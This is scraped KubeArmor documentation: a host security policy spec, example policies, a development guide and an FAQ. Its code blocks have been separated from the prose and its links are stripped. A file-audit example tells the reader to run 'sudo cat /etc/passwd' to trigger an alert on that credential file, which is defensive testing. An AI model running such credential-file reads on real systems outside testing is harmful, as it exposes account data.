    A security policy starts with the base information such as apiVersion, kind, and metadata. The apiVersion and kind would be the same in any security policies. In the case of metadata, you need to specify the name of a policy.

      apiVersion: security.kubearmor.com/v1
      kind: KubeArmorHostPolicy
      metadata:
        name: [policy name]

    Make sure that you need to use KubeArmorHostPolicy, not KubeArmorPolicy.

  • Severity

    You can specify the severity of a given policy from 1 to 10. This severity will appear in alerts when policy violations happen.

    severity: [1-10]
  • Tags

    The tags part is optional. You can define multiple tags (e.g., WARNING, SENSITIVE, MITRE, STIG, etc.) to categorize security policies.

    tags: ["tag1", ..., "tagN"]
  • Message

    The message part is optional. You can add an alert message, and then the message will be presented in alert logs.

    message: [message]
  • NodeSelector

    The node selector part is relatively straightforward. Similar to other Kubernetes configurations, you can specify (a group of) nodes based on labels.

      nodeSelector:
        matchLabels:
          [key1]: [value1]
          [keyN]: [valueN]

    If you do not have any custom labels, you can use system labels as well.

        kubernetes.io/arch: [architecture, (e.g., amd64)]
        kubernetes.io/hostname: [host name, (e.g., kubearmor-dev)]
        kubernetes.io/os: [operating system, (e.g., linux)]
  • Process

    In the process section, there are three types of matches: matchPaths, matchDirectories, and matchPatterns. You can define specific executables using matchPaths or all executables in specific directories using matchDirectories. In the case of matchPatterns, advanced operators may be able to determine particular patterns for executables by using regular expressions. However, we generally do not recommend using this match.

      process:
        matchPaths:
        - path: [absolute executable path]
          ownerOnly: [true|false]            # --> optional
          fromSource:                        # --> optional
          - path: [absolute executable path]
        matchDirectories:
        - dir: [absolute directory path]
          recursive: [true|false]            # --> optional
          ownerOnly: [true|false]            # --> optional
          fromSource:                        # --> optional
          - path: [absolute exectuable path]
        matchPatterns:
        - pattern: [regex pattern]
          ownerOnly: [true|false]            # --> optional

    In each match, there are three options.

    • ownerOnly (static action: allow owner only; otherwise block all)

      If this is enabled, the owners of the executable(s) defined with matchPaths and matchDirectories will be only allowed to execute.

    • recursive

      If this is enabled, the coverage will extend to the subdirectories of the directory defined with matchDirectories.

    • fromSource

      If a path is specified in fromSource, the executable at the path will be allowed/blocked to execute the executables defined with matchPaths or matchDirectories. For better understanding, let us say that an operator defines a policy as follows. Then, /bin/bash will be only allowed (blocked) to execute /bin/sleep. Otherwise, the execution of /bin/sleep will be blocked (allowed).

        process:
          matchPaths:
          - path: /bin/sleep
            fromSource:
            - path: /bin/bash
  • File

    The file section is quite similar to the process section.

      file:
        matchPaths:
        - path: [absolute file path]
          readOnly: [true|false]             # --> optional
          ownerOnly: [true|false]            # --> optional
          fromSource:                        # --> optional
          - path: [absolute file path]
        matchDirectories:
        - dir: [absolute directory path]
          recursive: [true|false]            # --> optional
          readOnly: [true|false]             # --> optional
          ownerOnly: [true|false]            # --> optional
          fromSource:                        # --> optional
          - path: [absolute file path]
        matchPatterns:
        - pattern: [regex pattern]
          readOnly: [true|false]             # --> optional
          ownerOnly: [true|false]            # --> optional

    The only difference between 'process' and 'file' is the readOnly option.

    • readOnly (static action: allow to read only; otherwise block all)

      If this is enabled, the read operation will be only allowed, and any other operations (e.g., write) will be blocked.

  • Network

    In the case of network, there is currently one match type: matchProtocols. You can define specific protocols among TCP, UDP, and ICMP.

      network:
        matchProtocols:
        - protocol: [protocol(,)]            # --> [ TCP | tcp | UDP | udp | ICMP | icmp ]
          fromSource:
          - path: [absolute file path]
  • Capabilities

      capabilities:
        matchCapabilities:
        - capability: [capability name(,)]
          fromSource:
          - path: [absolute file path]
  • Syscalls

    In the case of syscalls, there are two types of matches, matchSyscalls and matchPaths. matchPaths can be used to target system calls targeting specific binary path or anything under a specific directory, additionally you can slice based on syscalls generated by a binary or a group of binaries in a directory. You can use matchSyscall as a more general rule to match syscalls from all sources or from specific binaries.

syscalls:
  matchSyscalls:
  - syscall:
    - syscallX
    - syscallY
    fromSource:                            # --> optional
    - path: [absolute exectuable path]
    - dir: [absolute directory path]
      recursive: [true|false]              # --> optional
  matchPaths:
  - path: [absolute directory path | absolute exectuable path]
    recursive: [true|false]                # --> optional
    - syscall:
      - syscallX
      - syscallY
    fromSource:                            # --> optional
    - path: [absolute exectuable path]
    - dir: [absolute directory path]
      recursive: [true|false]              # --> optional

There is one options in each match.

  • fromSource If a path is specified in fromSource, kubearmor will match only syscalls generated by the defined source. For better undrestanding, lets take the example below. Only unlink system calls generated by /bin/bash will be matched.

      process:
        matchPaths:
        - path: /bin/sleep
          - syscall:
            - unlink
          fromSource:
          - path: /bin/bash
  • recursive

    If this is enabled, the coverage will extend to the subdirectories of the directory.

  • Action

    The action could be Audit or Block in general. In order to use the Allow action, you should define 'fromSource'; otherwise, all Allow actions will be ignored by default.

      action: [Audit|Block]

    If 'fromSource' is defined, we can use all actions for specific rules.

      action: [Allow|Audit|Block]

    For System calls monitoring, we only support audit mode no matter what the action is set to.

Policy Examples for Nodes/VMs

Here, we demonstrate how to define host security policies.

  • Process Execution Restriction

      • Explanation: The purpose of this policy is to block the execution of '/usr/bin/diff' in a host whose host name is 'kubearmor-dev'. For this, we define 'kubernetes.io/hostname: kubearmor-dev' in nodeSelector -> matchLabels and the specific path ('/usr/bin/diff') in process -> matchPaths. Also, we put 'Block' as the action of this policy.

      • Verification: After applying this policy, please open a new terminal (or connect to the host with a new session) and run '/usr/bin/diff'. You will see that /usr/bin/diff is blocked.

      NOTE

      The given policy works with almost every linux distribution. If it is not working in your case, check the process location. The following location shows location of sleep binary in different ubuntu distributions:

      • In case of Ubuntu 20.04 : /usr/bin/sleep

      • In case of Ubuntu 18.04 : /bin/sleep

  • File Access Restriction

      • Explanation: The purpose of this policy is to audit any accesses to a critical file (i.e., '/etc/passwd'). Since we want to audit one critical file, we use matchPaths to specify the path of '/etc/passwd'.

      • Verification: After applying this policy, please open a new terminal (or connect to the host with a new session) and run 'sudo cat /etc/passwd'. Then, check the alert logs of KubeArmor.

  • System calls alerting

    • Alert for all unlink syscalls

Generated telemetry
  • Alert on all rmdir syscalls targeting anything in /home/ directory and sub-directories

Generated telemetry

Development Guide

Development

1. Vagrant Environment (Recommended)

  • Requirements

    Here is the list of requirements for a Vagrant environment

    Clone the KubeArmor github repository in your system

    Install Vagrant and VirtualBox in your environment, go to the vagrant path and run the setup.sh file

  • VM Setup using Vagrant

    Now, it is time to prepare a VM for development.

    To create a vagrant VM

    Output will show up as ...

    To get into the vagrant VM

    Output will show up as ...

    To destroy the vagrant VM

    • VM Setup using Vagrant with Ubuntu 21.10 (v5.13)

      To use the recent Linux kernel v5.13 for dev env, you can run make with the NETNEXT flag set to 1 for the respective make option.

      You can also make the setting static by changing NETNEXT=0 to NETNEXT=1 in the Makefile.

2. Self-managed Kubernetes

  • Requirements

    Here is the list of minimum requirements for self-managed Kubernetes.

    Alternative Setup

    You can try the following alternative if you face any difficulty in the above Kubernetes (kubeadm) setup.

    Note Please make sure to set up the alternative k8s environment on the same host where the KubeArmor development environment is running.

    • K3s

    • MicroK8s

    • No Support - Docker Desktops

      KubeArmor does not work with Docker Desktops on Windows and macOS because KubeArmor integrates with Linux-kernel native primitives (including LSMs).

  • Development Setup

    In order to install all dependencies, please run the following command.

    Now, you are ready to develop any code for KubeArmor. Enjoy your journey with KubeArmor.

3. Environment Check

  • Compilation

    Check if KubeArmor can be compiled on your environment without any problems.

    If you see any error messages, please let us know the issue with the full error messages through #kubearmor-development channel on CNCF slack.

  • Execution

    In order to directly run KubeArmor in a host (not as a container), you need to run a local proxy in advance.

    Then, run KubeArmor on your environment.

    Note If you have followed all the above steps and still getting the warning The node information is not available, then this could be due to the case-sensitivity discrepancy in the actual hostname (obtained by running hostname) and the hostname used by Kubernetes (under kubectl get nodes -o wide). K8s converts the hostname to lowercase, which results in a mismatch with the actual hostname. To resolve this, change the hostname to lowercase using the command hostnamectl set-hostname <lowercase-hostname>.

  • KubeArmor Controller

    Starting from KubeArmor v0.11 - annotations, container policies, and host policies are handled via kubearmor controller, the controller code can be found under pkg/KubeArmorController.

    To install the controller from KubeArmor docker repository run

    To install the controller (local version) to your cluster run

    if you need to setup a local registry to push you image, use docker-registry.sh script under ~/KubeArmor/contribution/local-registry directory

Code Directories

Here, we briefly give you an overview of KubeArmor's directories.

  • Source code for KubeArmor (/KubeArmor)

  • Source code for KubeArmor Controller (CRD)

  • Deployment tools and files for KubeArmor

  • Files for testing

In the process section, there are three types of matches: matchPaths, matchDirectories, and matchPatterns. You can define specific executables using matchPaths or all executables in specific directories using matchDirectories. In the case of matchPatterns, advanced operators may be able to determine particular patterns for executables by using regular expressions. However, the coverage of regular expressions is highly dependent on AppArmor (). Thus, we generally do not recommend using this match.

In the case of capabilities, there is currently one match type: matchCapabilities. You can define specific capability names to allow or block using matchCapabilities. You can check available capabilities in .

The action could be Allow, Audit, or Block. Security policies would be handled in a blacklist manner or a whitelist manner according to the action. Thus, you need to define the action carefully. You can refer to for more details. In the case of the Audit action, we can use this action for policy verification before applying a security policy with the Block action. For System calls monitoring, we only support audit mode no matter what the action is set to.

Block a specific executable - In operator ()

Block a specific executable - NotIn operator()

Block a specific executable matching labels, In operator- In operator ()

Block accessing specific executable matching labels, NotIn operator ()

Block accessing specific file ()

Block a specific executable ()

Block accessing specific executable matching labels, In & NotIn operator ()

Block accessing specific executable matching labels, NotIn operator ()

Block all executables in a specific directory ()

Block all executables in a specific directory and its subdirectories ()

Allow specific executables to access certain files only ()

Allow a specific executable to be launched by its owner only ()

Allow accessing specific files only ()

Block all file accesses in a specific directory and its subdirectories ()

Audit ICMP packets ()

Block Raw Sockets (i.e., non-TCP/UDP packets) ()

Please refer to to set up your environment for KubeArmor contribution.

If some tests are failing, then fix them by following

If you have made changes in Operator or Controller, then follow

What platforms are supported by KubeArmor? How can I check whether my deployment will be supported?
  • Please check .

  • Use karmor probe to check if the platform is supported.

I am applying a blocking policy but it is not blocking the action. What can I check?

Checkout Binary Path

If the path in your process rule is not an absolute path but a symlink, policy enforcement won't work. This is because KubeArmor sees the actual executable path in events received from kernel space and is not aware about symlinks.

Policy enforcement on symbolic links like /usr/bin/python doesn't work and one has to specify the path of the actual executable that they link to.

Checkout Platform Support

Check karmor probe output and check whether Container Security is false. If it is false, the KubeArmor enforcement is not supported on that platform. You should check the and if the platform is not listed there then raise a new issue or connect to kubearmor community of .

Checkout Default Posture

If you are applying an Allow-based policies and expecting unknown actions to be blocked, please make sure to check the . The default security posture is set to Audit by default since KubeArmor v0.7.

How is KubeArmor different from PodSecurityPolicy/PodSecurityContext?

Native k8s supports specifying a security context for the pod or container. It requires one to specify native AppArmor, SELinux, seccomp policies. But there are a few problems with this approach:

  • All the OS distributions do not support the LSMs consistently. For e.g, supports AppArmor while supports SELinux and BPF-LSM.

  • The Pod Security Context expect the security profile to be specified in its native language, for instance, AppArmor profile for AppArmor. SELinux profile if SELinux is to be used. The profile language is extremely complex and this complexity could backfire i.e, it could lead to security holes.

  • Security Profile updates are manual and difficult: When an app is updated, the security posture might change and it becomes difficult to manually update the native rules.

  • No alerting of LSM violation on managed cloud platforms: By default LSMs send logs to kernel auditd, which is not available on most managed cloud platforms.

KubeArmor solves all the above mentioned problems.

  • It maps YAML rules to LSMs (apparmor, bpf-lsm) rules so prior knowledge of different security context (native AppArmor, SELinux) is not required.

  • It's easy to deploy: KubeArmor is deployed as a daemonset. Even when the application is updated, the enforcement rules are automatically applied.

  • Consistent Alerting: KubeArmor handles kernel events and maps k8s metadata using ebpf.

  • KubeArmor also runs in systemd mode so can directly run and protect Virtual Machines or Bare-metal machines too.

  • Pod Security Context cannot leverage BPF-LSM at all today. BPF-LSM provides more programmatic control over the policy rules.

  • Pod Security Context do not manage abstractions. As an example, you might have two nodes with Ubuntu, two nodes with Bottlerocket. Ubuntu, by default has AppArmor and Bottlerocket has BPF-LSM and SELinux. KubeArmor internally picks the right primitives to use for enforcement and the user do not have to bother explicitly stating what to use.

What is visibility that I hear of in KubeArmor and how to get visibility information?

KubeArmor, apart from been a policy enforcement engine also emits pod/container visibility data. It uses an eBPF-based system monitor which keeps track of process life cycles in containers and even nodes, and converts system metadata to container/node identities. This information can then be used for observability use-cases.

Sample output karmor logs --json:

{
  "Timestamp": 1639803960,
  "UpdatedTime": "2021-12-18T05:06:00.077564Z",
  "ClusterName": "Default",
  "HostName": "pandora",
  "HostPID": 3390423,
  "PPID": 168556,
  "PID": 3390423,
  "UID": 1000,
  "PolicyName": "hsp-kubearmor-dev-proc-path-block",
  "Severity": "1",
  "Type": "MatchedHostPolicy",
  "Source": "zsh",
  "Operation": "Process",
  "Resource": "/usr/bin/sleep",
  "Data": "syscall=SYS_EXECVE",
  "Action": "Block",
  "Result": "Permission denied"
}

Here the log implies that the process /usr/bin/sleep execution by 'zsh' was denied on the Host using a block based host policy.

The logs are also exportable in .

.

How to visualize KubeArmor visibility logs?

There are a couple of community maintained dashboards available at .

If you don't find an existing dashboard particular to your needs, feel free to create an issue. It would be really great if you could also contribute one!

How to fix `karmor logs` timing out?

karmor logs internally uses Kubernetes' client's port-forward. Port forward is not meant for long running connection and it times out if left idle. Checkout this for more info.

If you want to stream logs reliably there are a couple of solutions you can try:

  1. Modiy the kubearmor service in kubearmor namespace and change the service type to NodePort. Then run karmor with:

karmor logs --gRPC=<address of the kubearmor node-port service>

This will create a direct, more reliable connection with the service, without any internal port-forward.

  1. If you want to stream logs to external tools (fluentd/splunk/ELK etc) checkout .

The community has created adapters and dashboards for some of these tools which can be used out of the box or as reference for creating new adapters. Checkout the previous question for more information.

UEK R7 can be installed on OL 8.6 by following the easy-to-follow instructions provided here in this .

Note: KubeArmor now supports upgrading the nodes to BPF-LSM using . The following text is just an FYI but need not be used manually for k8s env.

The KubeArmor team has brought this to the attention of the on StackOverflow and await their response.

For more such differences checkout .

After this, exit out of the node shell and follow the .

Although there are many ways to run a Kubernetes cluster (like minikube or kind), it will not work with locally developed KubeArmor. KubeArmor needs to be on the same node as where the Kubernetes nodes exist. If you try to do this it will not identify your node since minikube and kind use virtualized nodes. You would either need to build your images and deploy them into these clusters or you can simply use k3s or kubeadm for development purposes. If you are new to these terms then the easiest way to do this is by following this guide:

You can refer to security policies defined for example microservices in .

Watch alerts using cli tool

For better understanding, you can check .

In the case of capabilities, there is currently one match type: matchCapabilities. You can define specific capability names to allow or block using matchCapabilities. You can check available capabilities in .

Block a specific executable ()

Audit a critical file access ()

Note Skip the steps for the vagrant setup if you're directly compiling KubeArmor on the Linux host. Proceed to setup K8s on the same host by resolving any dependencies.

KubeArmor is designed for Kubernetes environment. If Kubernetes is not setup yet, please refer to . KubeArmor leverages CRI (Container Runtime Interfaces) APIs and works with Docker or Containerd or CRIO based container runtimes. KubeArmor uses LSMs for policy enforcement; thus, please make sure that your environment supports LSMs (either AppArmor or bpf-lsm). Otherwise, KubeArmor will operate in Audit-Mode with no policy "enforcement" support.

You can also develop and test KubeArmor on K3s instead of the self-managed Kubernetes. Please follow the instructions in .

You can also develop and test KubeArmor on MicroK8s instead of the self-managed Kubernetes. Please follow the instructions in .

will automatically install , , , and some other dependencies.

Policy Core Reference
Capability List
Consideration in Policy Action
csp-in-operator-block-process.yaml
csp-not-in-operator-block-process.yaml
csp-matchlabels-in-block-process.yaml
csp-matchlabels-not-in-block-process.yaml
csp-in-operator-block-file-access.yaml
ksp-group-1-proc-path-block.yaml
ksp-match-expression-in-notin-block-process.yaml
ksp-match-expression-notin-block-process.yaml
ksp-ubuntu-1-proc-dir-block.yaml
ksp-ubuntu-2-proc-dir-recursive-block.yaml
ksp-ubuntu-3-file-dir-allow-from-source-path.yaml
ksp-ubuntu-3-proc-path-owner-allow.yaml
ksp-ubuntu-4-file-path-readonly-allow.yaml
ksp-ubuntu-5-file-dir-recursive-block.yaml
ksp-ubuntu-5-net-icmp-audit
ksp-ubuntu-1-cap-net-raw-block.yaml
development guide
Testing Guide
this
Support matrix for KubeArmor
KubeArmor Support Matrix
slack
default security posture
GKE COS
Bottlerocket
OpenTelemetry format
Detailed KubeArmor events spec
kubearmor/kubearmor-dashboards
StackOverflow answer
Streaming KubeArmor events
Oracle Blog Post
AppArmor community
Enforce Feature Parity Wiki
getting-started guide
K3s installation guide
examples
karmor
the KubeArmorHostPolicy spec diagram
Capability List
an updater daemonset
apiVersion: security.kubearmor.com/v1
kind: KubeArmorHostPolicy
metadata:
  name: hsp-kubearmor-dev-proc-path-block
spec:
  nodeSelector:
    matchLabels:
      kubernetes.io/hostname: kubearmor-dev
  severity: 5
  process:
    matchPaths:
    - path: /usr/bin/diff
  action:
    Block
apiVersion: security.kubearmor.com/v1
kind: KubeArmorHostPolicy
metadata:
  name: hsp-kubearmor-dev-file-path-audit
spec:
  nodeSelector:
    matchLabels:
      kubernetes.io/hostname: kubearmor-dev
  severity: 5
  file:
    matchPaths:
    - path: /etc/passwd
  action:
    Audit
apiVersion: security.kubearmor.com/v1
kind: KubeArmorHostPolicy
metadata:
  name: audit-all-unlink
spec:
  severity: 3
  nodeSelector:
        matchLabels:
          kubernetes.io/hostname: vagrant
  syscalls:
    matchSyscalls:
    - syscall:
      - unlink
  action:
    Audit
{
  "Timestamp": 1661937152,
  "UpdatedTime": "2022-08-31T09:12:32.967304Z",
  "ClusterName": "default",
  "HostName": "vagrant",
  "HostPPID": 8563,
  "HostPID": 310459,
  "PPID": 8563,
  "PID": 310459,
  "UID": 1000,
  "ProcessName": "/usr/bin/unlink",
  "PolicyName": "audit-all-unlink",
  "Severity": "3",
  "Type": "MatchedHostPolicy",
  "Source": "/usr/bin/unlink /home/vagrant/secret.txt",
  "Operation": "Syscall",
  "Resource": "/home/vagrant/secret.txt",
  "Data": "syscall=SYS_UNLINK",
  "Action": "Audit",
  "Result": "Passed"
}
apiVersion: security.kubearmor.com/v1
kind: KubeArmorHostPolicy
metadata:
  name: audit-home-rmdir
spec:
  severity: 3
  nodeSelector:
        matchLabels:
          kubernetes.io/hostname: vagrant
  syscalls:
    matchPaths:
    - syscall:
      - rmdir
      path: /home/
      recursive: true
  action:
    Audit
{
  "Timestamp": 1661936983,
  "UpdatedTime": "2022-08-31T09:09:43.894787Z",
  "ClusterName": "default",
  "HostName": "vagrant",
  "HostPPID": 308001,
  "HostPID": 308002,
  "PPID": 308001,
  "PID": 308002,
  "ProcessName": "/usr/bin/rmdir",
  "PolicyName": "audit-home-rmdir",
  "Severity": "3",
  "Type": "MatchedHostPolicy",
  "Source": "/usr/bin/rmdir jane-doe",
  "Operation": "Syscall",
  "Resource": "/home/jane-doe",
  "Data": "syscall=SYS_RMDIR",
  "Action": "Audit",
  "Result": "Passed"
}
Vagrant - v2.2.9
VirtualBox - v6.1
$ git clone https://github.com/kubearmor/KubeArmor.git
$ cd KubeArmor/contribution/vagrant
~/KubeArmor/contribution/vagrant$ ./setup.sh
~/KubeArmor/contribution/vagrant$ sudo reboot
~/KubeArmor/KubeArmor$ make vagrant-up
~/KubeArmor/KubeArmor$ make vagrant-ssh
~/KubeArmor/KubeArmor$ make vagrant-destroy
~/KubeArmor/KubeArmor$ make vagrant-up NETNEXT=1
~/KubeArmor/KubeArmor$ vi Makefile
OS - Ubuntu 18.04
Kubernetes - v1.19
Docker - 18.09 or Containerd - 1.3.7
Linux Kernel - v4.15
LSM - AppArmor
$ cd KubeArmor/contribution/self-managed-k8s
~/KubeArmor/contribution/self-managed-k8s$ ./setup.sh
$ cd KubeArmor/KubeArmor
~/KubeArmor/KubeArmor$ make
$ kubectl proxy &
$ cd KubeArmor/KubeArmor
~/KubeArmor/KubeArmor$ make run
$ cd KubeArmor/pkg/KubeArmorController
~/KubeArmor/pkg/KubeArmorController$ make deploy
$ cd KubeArmor/pkg/KubeArmorController
~/KubeArmor/pkg/KubeArmorController$ make docker-build deploy
KubeArmor/
  BPF                  - eBPF code for system monitor
  common               - Libraries internally used
  config               - Configuration loader
  core                 - The main body (start point) of KubeArmor
  enforcer             - Runtime policy enforcer (enforcing security policies into LSMs)
  feeder               - gRPC-based feeder (sending audit/system logs to a log server)
  kvmAgent             - KubeArmor VM agent
  log                  - Message logger (stdout)
  monitor              - eBPF-based system monitor (mapping process IDs to container IDs)
  policy               - gRPC service to manage Host Policies for VM environments
  types                - Type definitions
protobuf/              - Protocol buffer
pkg/KubeArmorController/  - KubeArmorController generated by Kube-Builder for KubeArmor Annotations, KubeArmorPolicy and KubeArmorHostPolicy
deployments/
  <cloud-platform-name>   - Deployments specific to respective cloud platform (deprecated - use karmor install or helm)
  controller              - Deployments for installing KubeArmorController alongwith cert-manager
  CRD                     - KubeArmorPollicy and KubeArmorHostPolicy CRDs
  get                     - Stores source code for deploygen, a tool used for specifying kubearmor deployments
  helm/
      KubeArmor           - KubeArmor's Helm chart
      KubeArmorOperator   - KubeArmorOperator's Helm chart
examples/     - Example microservices for testing
tests/        - Automated test framework for KubeArmor
hsp-kubearmor-dev-proc-path-block.yaml
hsp-kubearmor-dev-file-path-audit.yaml
Kubernetes installation guide
K3s installation guide
MicroK8s installation guide
setup.sh
BCC
Go
Protobuf
here
KubeArmor High Level Design
fork button
fork screen
fork repo
commit ahead
after pull request
open pull request